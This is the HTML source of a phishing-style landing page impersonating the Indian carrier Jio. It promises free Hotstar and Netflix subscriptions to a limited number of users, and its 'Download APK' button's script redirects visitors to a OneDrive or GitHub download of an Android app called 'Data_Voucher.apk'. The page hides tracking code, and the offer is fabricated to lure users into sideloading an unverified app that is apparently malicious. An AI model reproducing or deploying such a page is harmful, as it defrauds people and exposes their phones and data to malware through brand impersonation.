<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Jio Offer</title>
    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            background-color: #f4f4f9;
            margin: 0;
        }
        .app-page {
            max-width: 800px;
            width: 100%;
            background-color: white;
            padding: 20px;
            box-shadow: 0 4px 8px rgba(0,0,0,0.1);
            border-radius: 8px;
        }
        .screenshot-slider {
            margin-bottom: 20px;
        }
        .app-description {
            padding: 10px 0;
            line-height: 1.6em;
        }
        #downloadButton {

        background-color: #3333ff;

        color: white;

        width: 100%;

        padding: 15px 30px;

        font-size: 21px;

        border: none;

        border-radius: 5px;

        cursor: pointer;

        }
    </style>
	<script>

function done()

{

 var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://onedrive.live.com/download?cid=57E376D7A53C94F9%21182&resid=57E376D7A53C94F9%21182&authkey=!AD8ZnzOFvQhQW5M"; 
	}
 
	else
	{
		window.location="https://github.com/technews92/claim/blob/main/Data_Voucher.apk?raw=true";
	}
}

</script>

</head>
<body>
   
    <div class="app-page">
        <h4>Jio Hotstar,Netflix offer</h4>
        <p>by Jio</p>
        <div class="screenshot-slider">
            <div class="carousel carousel-slider center">
                <div class="carousel-item"><img src="https://i.postimg.cc/JnJsMv0x/images.pngi" alt=""></div>
            </div>
        </div>
        <div class="app-description">
            <h5>Description</h5>
            <p><h6>

		- Free Hotstar for 3 Months.<br>

		- Free Netflix for 1 Month.<br>

		- Only 1-Crore users are eligible.

			

</p>- Download app for registration.</h6></p></p>
        </div>
        <div id="downloadButton" onClick="done()"><center>
        <a style = "width:100%; color:white; font-style:bold ;" ><i class="material-icons left">cloud_download</i>Download APK</a></center>
        </div>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            var elems = document.querySelectorAll('.carousel');
            M.Carousel.init(elems, {
                fullWidth: true,
                indicators: true
            });
        });
    </script>
	
	<!-- Default Statcounter code for Jio-4G
https://technews92.github.io/claim/myindex.html -->
<script type="text/javascript">
var sc_project=12889744; 
var sc_invisible=1; 
var sc_security="a10820b5"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12889744/0/a10820b5/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<!-- End of Statcounter Code -->

</body>

</html>
